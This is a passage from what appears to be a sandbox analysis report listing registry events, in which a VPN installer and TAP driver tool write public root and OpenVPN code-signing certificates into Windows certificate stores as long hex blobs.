Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" MicrosoftEdge.exe -
Processes:
vpn.tmpgfs0dd1ffhu.exetapinstall.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B gfs0dd1ffhu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC gfs0dd1ffhu.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 gfs0dd1ffhu.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd gfs0dd1ffhu.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd gfs0dd1ffhu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA gfs0dd1ffhu.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be gfs0dd1ffhu.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a